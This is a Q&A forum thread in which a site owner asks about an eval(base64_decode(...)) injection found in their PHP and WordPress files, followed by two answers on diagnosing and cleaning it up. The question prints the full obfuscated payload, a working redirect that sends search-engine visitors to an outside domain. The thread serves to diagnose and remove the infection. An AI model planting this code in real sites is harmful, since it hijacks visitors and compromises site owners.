Malicious code : eval(base64_decode(

Question

Recently I noticed a jquery mobile - php website created was not loading. When I checked the related php files, I could see that some extra characters have gone into the code. The extraneous characters were showing up soon after the tag <?php . What is the reason for it? Is my website hacked? How will I recover all my files? The files are being accessed via control panel login.I could even see that the files outside the website folder, some wp files (wp-config.php,wp-blog-header.php etc) were also containing those extra characters.

This is the malicious code found - <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI

Someone out there, please advise.

Here is the full code

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

Answer 1

To answer the direct question: yes, your site has been hacked.

The eval(base64_decode(....)) is intended to disguise the nature of the code being executed, but it can't disguise the fact that there is code in your PHP files that does not belong there.

As for what the hacked code does, I'm unable to answer that, as you haven't provided all of it.

I also can't answer any question as to how they might have got in, but the likelyhood is that somewhere in your system (or in your web hosting company's system) there is a software package which has a known security flaw.

In most cases, this flaw will have been fixed by the providers of that software, but the version on the hacked site won't have been updated with the latest fixes, thus giving the hackers an opportunity to get in.

There are other methods to break into a site, but this is by far the most likely.

I can't tell you which software was used to hack your site; there are too many variables involved, and I don't know enough about it. I can advise you to make sure that all the software you are responsible for is secure and running the latest versions, and to check with your hosting company to make sure they're fully up-to-date as well.

You haven't mentioned Wordpress by name, but the files you've specified sound like they belong to Wordpress. Therefore, recovering the files should be simply a case of updating them back to the original Wordpress versions. However, as I say, you should make sure you update to the latest WP version, because it sounds like the version you've got is out of date and vulnerable.

The actual data in your pages may have been compromised, but the nature of the hack described, it sounds more like a PHP injection hack, so I would expect that if you get the WP files back to their original state, your pages will be restored. You should check thoroughly, however, to make sure there isn't anything unexpected still lurking in there.

[EDIT] Now we have the full code, it's easy to see what it's doing: copy the code into a small PHP program, and replace eval with print, so you can see is being run, rather than actually running it. The answer is that it checks that the user isn't a googlebot or similar, and if not, it redirects the page to a malicious URL.

Answer 2

This is a common problem on old installations of WordPress and other old CMS, especially those that use an old version of timthumb to dynamically manipulate images.

Someone injected that code into the top of probably most of your .PHP files (at least those that open with a blank line of <?php). This happened to me several months ago.

The eval() code is basically "encrypting" malicious PHP code and running it (evaluating it) when the PHP file opens. It's impossible to determine what the code does without seeing the full base64 string (and decoding it) but if it's anything like the injection that happened to me, it's appending some JavaScript code to your site to redirect the visitor to a malicious page, or otherwise alter link behavior within your website.

You need to find the hole that led to this, and close it. If it's an outdated version of WordPress, upgrade. Check your access logs for suspicious POST queries.

The only way I know to fix this, is to remove the PHP code from every PHP file on your box. There are Linux bash commands and advanced text editors you can use to remove the code from multiple files, if it's identical in each file. If not, grab the files, Notepad and a heaping cup of coffee :)